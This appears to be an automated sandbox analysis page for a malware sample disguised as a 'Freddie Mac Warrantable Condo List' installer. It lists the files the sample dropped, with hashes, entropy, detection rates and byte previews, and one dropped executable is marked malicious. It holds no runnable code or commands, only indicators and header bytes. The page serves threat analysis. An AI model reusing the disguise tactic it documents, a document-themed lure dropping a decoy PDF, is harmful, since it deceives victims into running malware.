C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20268
Entropy (8bit):	5.587393873791828
Encrypted:	false
SSDEEP:	384:0t9MGhH20MKMTswc0x+RcSg3OFmbqjuldIP33ahSI3ECdLfCs6qPHK:2T7wcOKFmbqCldZPErJl
MD5:	48B54175780BCCAD086934C4E4D15E69
SHA1:	EF97B09F722765CD73664E36D41567CF643F6234
SHA-256:	6C77A8A4D2E5F2723227A9420DD7E17C7943F6AA8E91DC210DD707EA28CB1EF0
SHA-512:	01E94B0DA409E225A77461229873DB39B8D9EE660945BA7FC971961E547B0F55B095F572561535836F4CCC97D36206C70C9C1372FD5F9FAA882C40B7B480AB0D
Malicious:	false
Reputation:	unknown
Preview:	@...e...........\|.......h.......t.........J..........@..........H...............<@.^.L."My...:>..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0o4igt0e.r3j.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h0mq3bd.0sy.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5brjequs.s4b.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbhx4sfn.zrb.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kp0mcnyu.hgf.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3riyyyg.mlw.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyqeq1xz.dsr.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nq0tdduv.ls1.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opa1inlg.apf.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqxavrf0.bmw.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpxidrsr.rt5.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbuorgl5.rjl.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj3bnkkm.22m.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1bpnsjf.dq0.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh3pvmeb.vpg.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vsdupku5.o1l.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmpli3vg.bxk.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxinky1l.csr.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x25lc30w.djo.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwr21zm1.orf.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytutb211.r4d.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyfsbtzi.ljx.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_isdecmp.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_setup64.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\nyc-204_2016.pdf Download File
Process:	C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp
File Type:	PDF document, version 1.4
Category:	dropped
Size (bytes):	779052
Entropy (8bit):	5.4075171599463925
Encrypted:	false
SSDEEP:	3072:hRL1kjbv1kVFJ+GMnrlqB5a7BEeTPeCBLhXbuLcE84ZXvB:h510E+TnqqXbuLZZXZ
MD5:	31710A6E10CC4B0F068E4657B2EE5494
SHA1:	15B5087AEE7103682B6DF13D4EDDE5276A94AA0D
SHA-256:	69D502A425626A4C84A2A8D58477F32B3F92ADEC0A56E371F5DE1BB1B0E89E04
SHA-512:	1BB41C8F1991DA1D6E441EEE815E4B21F93B9C828BDC272829A104470D028066C8D0DDC892A2E7C0DEDCA6779F3073DE17EFC0938261418D2E811987D455A12B
Malicious:	false
Reputation:	unknown
Preview:	%PDF-1.4.%.....1 0 obj.<<./Type/ExtGState./SM 0.001.>>.endobj.2 0 obj.<<./Type/ExtGState./OPM 1./OP true.>>.endobj.3 0 obj.<<./Type/ExtGState./OP false.>>.endobj.4 0 obj.<<./FunctionType 4./Length 14./Range[0 1]./Domain[0 1].>>.stream.{ 1 exch sub }.endstream.endobj.5 0 obj.[/Separation/All/DeviceGray 4 0 R].endobj.6 0 obj.<<./FunctionType 4./Length 179./Range[0 1 0 1 0 1 0 1]./Domain[0 1].>>.stream.{ 0 0 0 0 5 4 roll 0 index 3 -1 roll add 2 1 roll pop dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll }.endstream.endobj.7 0 obj.[/DeviceN[/Black]/DeviceCMYK 6 0 R].endobj.8 0 obj.<<./Length 105988.>>.stream./GS0 gs.0 0 0 0 k.26.561 40.99 420.975 435.946 re.f./GS1 gs.BT./F8 1 Tf.9 0 0 9 31.6653 469.1401 Tm.0 0 0 1 k.[(\t)]TJ.0.45606 0 Td.[<07>228]TJ./F3 1 Tf.1.16197 0 Td.[<19>]TJ.0.66699 0 Td.[(E)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(9)]TJ.0.22217 0 Td.[(>)]TJ.0.55616 0 Td.[(5)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(C)]TJ

C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp Download File
Process:	C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3156992
Entropy (8bit):	6.365159560244291
Encrypted:	false
SSDEEP:	49152:REA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVQ33387:192bz2Eb6pd7B6bAGx7q333Q
MD5:	8693B9CFB8B4C466AE12CCDC2FEB46CE
SHA1:	3AF2687BE88754CC17CB3CAAC57331A467F554BB
SHA-256:	AF1E952B5B02CA06497E2050BD1CE8D17B9793FDB791473BDAE5D994056CB21F
SHA-512:	997AEC8FA4948C301EC4FC5D50DB5AACE33A1D0F73BB0A75B748F1208BE72616290077D9C78228EDE34917B5D7E85B2CF70402969002BB8C131911C5F1D32C87
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.t.....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc...t.....-.......-.............@..@..............1.......0.............@..@........................................................

C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf Download File
Process:	C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp
File Type:	PDF document, version 1.4
Category:	dropped
Size (bytes):	779052
Entropy (8bit):	5.4075171599463925
Encrypted:	false
SSDEEP:	3072:hRL1kjbv1kVFJ+GMnrlqB5a7BEeTPeCBLhXbuLcE84ZXvB:h510E+TnqqXbuLZZXZ
MD5:	31710A6E10CC4B0F068E4657B2EE5494
SHA1:	15B5087AEE7103682B6DF13D4EDDE5276A94AA0D
SHA-256:	69D502A425626A4C84A2A8D58477F32B3F92ADEC0A56E371F5DE1BB1B0E89E04
SHA-512:	1BB41C8F1991DA1D6E441EEE815E4B21F93B9C828BDC272829A104470D028066C8D0DDC892A2E7C0DEDCA6779F3073DE17EFC0938261418D2E811987D455A12B
Malicious:	false
Reputation:	unknown
Preview:	%PDF-1.4.%.....1 0 obj.<<./Type/ExtGState./SM 0.001.>>.endobj.2 0 obj.<<./Type/ExtGState./OPM 1./OP true.>>.endobj.3 0 obj.<<./Type/ExtGState./OP false.>>.endobj.4 0 obj.<<./FunctionType 4./Length 14./Range[0 1]./Domain[0 1].>>.stream.{ 1 exch sub }.endstream.endobj.5 0 obj.[/Separation/All/DeviceGray 4 0 R].endobj.6 0 obj.<<./FunctionType 4./Length 179./Range[0 1 0 1 0 1 0 1]./Domain[0 1].>>.stream.{ 0 0 0 0 5 4 roll 0 index 3 -1 roll add 2 1 roll pop dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll }.endstream.endobj.7 0 obj.[/DeviceN[/Black]/DeviceCMYK 6 0 R].endobj.8 0 obj.<<./Length 105988.>>.stream./GS0 gs.0 0 0 0 k.26.561 40.99 420.975 435.946 re.f./GS1 gs.BT./F8 1 Tf.9 0 0 9 31.6653 469.1401 Tm.0 0 0 1 k.[(\t)]TJ.0.45606 0 Td.[<07>228]TJ./F3 1 Tf.1.16197 0 Td.[<19>]TJ.0.66699 0 Td.[(E)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(9)]TJ.0.22217 0 Td.[(>)]TJ.0.55616 0 Td.[(5)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(C)]TJ

C:\Users\user\AppData\Roaming\GDxf0yHwcZU9xLAHcN3JSGaL3AO0YeLn0h7ykbHzu9qO8Vejrj0ECo5IQNq5syn7IPGAbAul2yu31hzldWNDTqrwnPcHLRlCATtxIfgM2DKnMTFjZiGhYeZdq9ANj6_XX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	129
Entropy (8bit):	5.657983650537297
Encrypted:	false
SSDEEP:	3:cVjSpklv+pjzOA/CczGPXSYvfaQZxNsLMtZjLCRc5a9:cJtvWWWzGvAQ/GwtZyu2
MD5:	8E0647B31B13AF72C984DB3919E53B81
SHA1:	5A7E3070303FCA0D39E1CCA8368E5EB1613E3F84
SHA-256:	009BF4F08529EAD375827690D2C3532CA8E65A09CEED259685517FFC9F983FDA
SHA-512:	664722123F7C2368A5165B6A70D525AD25D108FBC5A594877B5046847B4BEA51EC7730AE166E2FAEF4994F7EE27AC93CEA0F27F422144F3AFCBA4476E6D80B36
Malicious:	false
Reputation:	unknown
Preview:	GDxf0yHwcZU9xLAHcN3JSGaL3AO0YeLn0h7ykbHzu9qO8Vejrj0ECo5IQNq5syn7IPGAbAul2yu31hzldWNDTqrwnPcHLRlCATtxIfgM2DKnMTFjZiGhYeZdq9ANj6_XX

